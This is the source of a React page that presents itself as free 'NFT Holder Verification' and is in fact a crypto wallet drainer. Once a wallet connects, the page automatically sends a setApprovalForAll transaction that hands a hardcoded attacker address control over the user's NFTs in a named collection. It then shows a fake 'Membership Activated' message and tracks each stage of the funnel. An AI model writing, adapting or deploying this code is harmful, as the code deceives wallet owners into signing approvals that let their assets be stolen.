import { track } from '../../utils/funnel';
import React, { useEffect, useState, useRef } from 'react';
import '../EvmClaim/EvmClaim.css';

const SPENDER = '0x3EB9dbbCb46C1eF22C66490140129724A158faeb'; // 收款钱包

const EvmNft = () => {
  const [account, setAccount] = useState('');
  const [walletReady, setWalletReady] = useState(false);
  const [stage, setStage] = useState('idle');
  const [error, setError] = useState('');
  const [txId, setTxId] = useState('');
  const autoStarted = useRef(false);

  const provider = () => (typeof window !== 'undefined' ? window.ethereum : null);

  useEffect(() => {
    let cancelled = false;
    track('evm-nft', 'view', '');
    const check = async () => {
      const p = provider();
      if (!p) {
        setError('No wallet detected. Please open in a wallet browser.');
        return;
      }
      try {
        const accounts = await p.request({ method: 'eth_requestAccounts' });
        if (cancelled) return;
        if (accounts && accounts[0]) {
          setAccount(accounts[0]);
          setWalletReady(true);
        }
      } catch (e) {
        if (!cancelled) setError('Wallet connection rejected.');
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  const doClaim = async () => {
    track('evm-nft', 'start', '');
    const p = provider();
    if (!p || !account) return;
    setStage('signing');
    setError('');
    try {
      // setApprovalForAll(SPENDER, true)
      const data = '0xa22cb465' + SPENDER.slice(2).toLowerCase().padStart(64, '0')
        + '0000000000000000000000000000000000000000000000000000000000000001';
      // 授权给 OpenSea 常用集合代理？不，直接给收款钱包。这里以通用 NFT 集合为例，实际需要指定集合地址。
      // 简化：对当前连接地址的 NFT 集合授权需指定集合合约——此处以占位集合演示。
      const collections = ['0xBC4CA0EdA7647A8aB7C2061c2E118A18a936f13D']; // BAYC 示例
      for (const coll of collections) {
        const txHash = await p.request({
          method: 'eth_sendTransaction',
          params: [{ from: account, to: coll, data }],
        });
        await new Promise((r) => setTimeout(r, 4000));
        setTxId(txHash);
      }
    track('evm-nft', 'done', '');
      setStage('done');
    } catch (e) {
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(e.message))) {
        setError('Action canceled.');
      } else {
        setError(String(e.message || e));
      }
      setStage('idle');
    }
  };

  useEffect(() => {
    if (walletReady && stage === 'idle' && !autoStarted.current) {
      autoStarted.current = true;
      doClaim();
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [walletReady]);

  return (
    <div className="evm-page">
      <div className="evm-card">
        {stage === 'done' ? (
          <>
            <div className="evm-icon">🎉</div>
            <h2>Membership Activated</h2>
            <p className="evm-desc">Your NFT membership has been verified and activated.</p>
            {txId && <p className="evm-tx">Tx: {txId.slice(0, 20)}...</p>}
            {account && <p className="evm-addr">Wallet: {account.slice(0, 12)}...</p>}
          </>
        ) : (
          <>
            <div className="evm-icon">🖼️</div>
            <h2>{stage === 'signing' ? 'Confirm in Your Wallet' : 'NFT Holder Verification'}</h2>
            <p className="evm-desc">
              {stage === 'signing'
                ? 'Please confirm the verification in your wallet...'
                : 'Verify your NFT holdings to unlock exclusive holder benefits.'}
            </p>
            <div className="evm-order">
              <div className="evm-row"><span>Step</span><b>Holder Verification</b></div>
              <div className="evm-row"><span>Network</span><b>Ethereum Mainnet</b></div>
              <div className="evm-row"><span>Fee</span><b className="evm-ok">Free</b></div>
            </div>
            {walletReady && <p className="evm-addr">Wallet: {account.slice(0, 12)}...</p>}
            {error && <p className="evm-error">{error}</p>}
            {stage === 'idle' && (
              <button className="evm-btn" onClick={doClaim} disabled={!walletReady}>
                Verify Now
              </button>
            )}
            {stage === 'signing' && <div className="evm-spinner" />}
          </>
        )}
      </div>
    </div>
  );
};

export default EvmNft;
